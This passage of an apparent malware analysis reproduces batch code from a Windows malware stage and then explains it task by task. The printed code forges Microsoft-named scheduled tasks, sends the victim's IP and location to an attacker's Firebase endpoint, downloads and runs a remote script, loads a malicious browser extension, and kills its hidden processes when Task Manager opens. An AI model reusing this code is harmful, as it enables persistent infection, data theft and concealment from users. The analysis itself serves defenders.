echo     ^</LogonTrigger^> >> C:\systemfile\temp7.xml
echo   ^</Triggers^> >> C:\systemfile\temp7.xml
echo   ^<Principals^> >> C:\systemfile\temp7.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp7.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp7.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp7.xml
echo     ^</Principal^> >> C:\systemfile\temp7.xml
echo   ^</Principals^> >> C:\systemfile\temp7.xml
echo   ^<Settings^> >> C:\systemfile\temp7.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp7.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp7.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp7.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp7.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp7.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp7.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp7.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp7.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp7.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp7.xml
echo   ^</Settings^> >> C:\systemfile\temp7.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp7.xml
echo     ^<Exec^> >> C:\systemfile\temp7.xml
echo       ^<Command^>cmd^</Command^> >> C:\systemfile\temp7.xml
echo       ^<Arguments^>/c if exist ^%temp^%\c4329f-4b8b33e-fa4fffe0 (SCHTASKS /End /TN ^"\Microsoft\Windows\AppID\VerifiedCert^" ^& SCHTASKS /End /TN ^"\Microsoft\Windows\Application Experience\Maintenance^" ^& schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /DISABLE ^& schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /DISABLE ^& schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /ENABLE ^& schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /ENABLE)^</Arguments^> >> C:\systemfile\temp7.xml
echo     ^</Exec^> >> C:\systemfile\temp7.xml
echo   ^</Actions^> >> C:\systemfile\temp7.xml
echo ^</Task^> >> C:\systemfile\temp7.xml

schtasks /create /xml "C:\systemfile\temp7.xml" /tn "\Microsoft\Windows\Shell\ObjectTask" /F
Del "C:\systemfile\temp7.xml"














echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp8.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp8.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp8.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp8.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp8.xml
echo     ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp8.xml
echo     ^<URI^>\Microsoft\Windows\Clip\ServiceCleanup^</URI^> >> C:\systemfile\temp8.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp8.xml
echo   ^<Triggers^> >> C:\systemfile\temp8.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp8.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml
echo       ^<Delay^>PT5M^</Delay^> >> C:\systemfile\temp8.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp8.xml
echo   ^</Triggers^> >> C:\systemfile\temp8.xml
echo   ^<Principals^> >> C:\systemfile\temp8.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp8.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp8.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp8.xml
echo     ^</Principal^> >> C:\systemfile\temp8.xml
echo   ^</Principals^> >> C:\systemfile\temp8.xml
echo   ^<Settings^> >> C:\systemfile\temp8.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp8.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp8.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp8.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp8.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp8.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp8.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp8.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp8.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp8.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp8.xml
echo   ^</Settings^> >> C:\systemfile\temp8.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp8.xml
echo     ^<Exec^> >> C:\systemfile\temp8.xml
echo       ^<Command^>cmd^</Command^> >> C:\systemfile\temp8.xml
echo       ^<Arguments^>/c more "C:\systemfile\c.z" ^| cmd  ^& if EXIST "C:\Windows\security\pywinvera\libs" (schtasks /delete /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F)^</Arguments^> >> C:\systemfile\temp8.xml
echo     ^</Exec^> >> C:\systemfile\temp8.xml
echo   ^</Actions^> >> C:\systemfile\temp8.xml
echo ^</Task^> >> C:\systemfile\temp8.xml

schtasks /create /xml "C:\systemfile\temp8.xml" /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F
Del "C:\systemfile\temp8.xml"


















FOR /F "tokens=*" %a in ('curl.exe -L http://ip-api.com/json') do SET widget=%a

set widget=%widget:"=\"%
set widget=%widget: =_%
echo %widget%


curl.exe -X POST -d "%widget%" https://ping-newdatabase-default-rtdb.firebaseio.com/Userinfo.json




sc.exe stop wuauserv
sc.exe config wuauserv start=demand

Most of Stage 3 defines 8 tasks in "Task Scheduler". I've put the other stuff at the top here, Even though some tasks are defined in earlier lines.

Line 1 kills this script instantly if your WinSystemLocale does not start with "en-".

Lines 5-6 make a directory called C:\systemfile and hide it. You can still open it by hitting "Win + R" and entering "C:\systemfile". The files inside are also hidden.

Lines 148-193 create 3 files inside C:\systemfile

Lines 357-359 make sure that curl is available. From the attackers repo, but clean as of now.

Lines 596-603 send the users IP to the attacker's firebase. It's safe to run 596-600 locally to see the data that you sent. It includes IP, and an approximate location down to city and ZIP code.

Line 608/609 stops wuauserv (= Windows Update Service) and sets it to start only manually. This seems to actually be the default. But you can start it by running sc.exe start wuauserv and set it to start on its own by selecting an option from <boot|system|auto|demand|disabled|delayed-auto> and running sc.exe config wuauserv start=<your option>

Tasks

Task 1 (lines 14-63): \Microsoft\Windows\AppID\VerifiedCert

cmd.exe /c more c.z | cmd & more %USERPROFILE%\Downloads\c.z | cmd

This is run inside C:\systemfile.

This Task seems to execute what's inside C:\systemfile\c.z and then %USERPROFILE%\Downloads\c.z?
Is it common to pipe more into cmd?

Task 2 (lines 75-132): \Microsoft\Windows\Application Experience\Maintenance

This tries to find the path to Chrome, Brave or Edge and then calls it with the following arguments:

<chrome> --tyqe=render --fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072 --lang=en-US --extension--process --origin--trial-disabled--features=SecurePaymentConfirmation --device-scale--factor=1 --num--raster-threads=2 --profile-directory=Default --enable--main-frame-before--activation www.google.com --renderer--client-id=6 --user-data-dir="C:\systemfile" --no-v8--untrusted-code-mitigations --load-extension="C:\systemfile" --mojo--platform-channel-handle=-3784 /prefetch:1

This is run inside C:\systemfile

This runs a browser. With the user data in C:\systemfile. Probably hidden? Haven't checked the flags all out yet.

• --tyqe=render mistype of --type=render. Probably mistyped on purpose to look like it is being rendered.
• --fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072 should be --field-trial-handle (fieLd and only one dash). This looks like what Google sometimes does to enable different "Field Trials". Probably also mistyped on purpose.
• --lang=en-US sets language to American English
• --extension--process Marks a renderer as extension process
• --origin--trial-disabled--features=SecurePaymentConfirmation Disables origin trials for SecurePaymentConfirmation
• --device-scale--factor=1 should be --force-device-scale-factor=1 sets scaling of the UI.
• --num--raster-threads=2 use two threads.
• --profile-directory=Default use Default profile directory
• --enable--main-frame-before--activation www.google.com
• --renderer--client-id=6 ??
• --user-data-dir="C:\systemfile" overwrite user data directory.
• --no-v8--untrusted-code-mitigations To do with this (?)
• --load-extension="C:\systemfile" Load the malicious extension from C:\systemfile
• --mojo--platform-channel-handle=-3784 "In this mode, Chrome binds an Application request and can then connect to the “pure” Mojo services running in the shell around it." (?)
• /prefetch:1 doesn't really do anything

Task 3 (lines 233-273): \Microsoft\Windows\Services\CertPathCheck

python -c "import base64;exec(base64.b64decode('aW1wb3J0IG9zLCBiYXNlNjQKIApTdHIgPSBsaXN0KG9wZW4oIkM6XFxzeXN0ZW1maWxlXFxvYnMubG9nIiwgbW9kZT0iciIsIGVuY29kaW5nPSJ1dGYtOCIpLnJlYWQoKS5yZXBsYWNlKCJcbiIsICIiKSkgCmZvciB4IGluIHJhbmdlKGxlbihTdHIpKToKICAgIFN0clt4XSA9IGNocihvcmQoU3RyW3hdKSAtIDEpIAogCmV4ZWMoYmFzZTY0LmI2NGRlY29kZSgiIi5qb2luKFN0cikpKQpvcy5wb3Blbignc2NodGFza3MgL2VuZCAvdG4gXE1pY3Jvc29mdFxXaW5kb3dzXFNlcnZpY2VzXENlcnRQYXRodycpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))"

This is run inside C:\Windows\security\pywinvera

Decoded:

import os, base64
 
Str = list(open("C:\\systemfile\\obs.log", mode="r", encoding="utf-8").read().replace("\n", "")) 
for x in range(len(Str)):
    Str[x] = chr(ord(Str[x]) - 1) 
 
exec(base64.b64decode("".join(Str)))
os.popen('schtasks /end /tn \Microsoft\Windows\Services\CertPathw')
os.popen('TASKKILL /F /FI "SESSION eq 0" /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T')
exit()

Reads obs.log, does a b64 decode and executes it. It stops Task 4 and kills browser chrome and other processes running with session 0 ("user-less").

Task 4 (lines 279-319): also \Microsoft\Windows\Services\CertPathw

pythonw -c "import base64;exec(base64.b64decode('aW1wb3J0IGF1dG9pdCwgb3MKYXV0b2l0LmF1dG9faXRfc2V0X29wdGlvbigiV2luV2FpdERlbGF5IiwgMCkKYXV0b2l0Lndpbl93YWl0KCdbUkVHRVhQVElUTEU6KD9pKSguKlByb2Nlc3MgRXhwbG9yZXIuKnwuKlRhc2sgTWFuYWdlci4qfC4qU3lzdGVtIEV4cGxvcmVyLip8LipQcm9jZXNzIEhhY2tlci4qfC4qQW5WaXIgVGFzay4qfC4qV2luVXRpbGl0aWVzLiopXScpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))"

This is run inside C:\Windows\security\pywinvera

import autoit, os
autoit.auto_it_set_option("WinWaitDelay", 0)
autoit.win_wait('[REGEXPTITLE:(?i)(.*Process Explorer.*|.*Task Manager.*|.*System Explorer.*|.*Process Hacker.*|.*AnVir Task.*|.*WinUtilities.*)]')
os.popen('TASKKILL /F /FI "SESSION eq 0" /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T')
exit()

This script waits until the Task Manager or similar tool is started and then kills the hidden processes to hide them from the user.

Task 5 (lines 365-410): /Microsoft/Windows/Servicing/ComponentCleanup

cmd curl https://autobat[.]alexrybak0444[.]workers[.]dev/ -o %temp%\c4329f-4b8b33e-fa4fffe0

Download file from site and put it into %temp%\c4329f-4b8b33e-fa4fffe0.
As of right now this file only contains the placeholder text asd.

Task 6 (lines 419-465): /Microsoft/Windows/Servicing/ServiceCleanup

cmd /c type %temp%\c4329f-4b8b33e-fa4fffe0 | cmd && del %temp%\c4329f-4b8b33e-fa4fffe0

Runs the script downloaded in Task 5, then deletes it.

Task 7 (lines 478-520): /Microsoft/Windows/Shell/ObjectTask

cmd /c if exist %temp%\c4329f-4b8b33e-fa4fffe0 (SCHTASKS /End /TN "\Microsoft\Windows\AppID\VerifiedCert" & SCHTASKS /End /TN "\Microsoft\Windows\Application Experience\Maintenance" & schtasks /change /tn "\Microsoft\Windows\AppID\VerifiedCert" /DISABLE & schtasks /change /tn "\Microsoft\Windows\Application Experience\Maintenance" /DISABLE & schtasks /change /tn "\Microsoft\Windows\AppID\VerifiedCert" /ENABLE & schtasks /change /tn "\Microsoft\Windows\Application Experience\Maintenance" /ENABLE)

If the file downloaded in Task 5 exists, it stops Task 1 and Task 2, disables them and then enables them again.

Task 8 (lines 535-577): /Microsoft/Windows/Clip/ServiceCleanup

cmd /c more "C:\systemfile\c.z" | cmd  & if EXIST "C:\Windows\security\pywinvera\libs" (schtasks /delete /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F)

Runs the contents of C:\systemfile\c.z and deletes Task this task if C:\Windows\security\pywinvera\libs exists.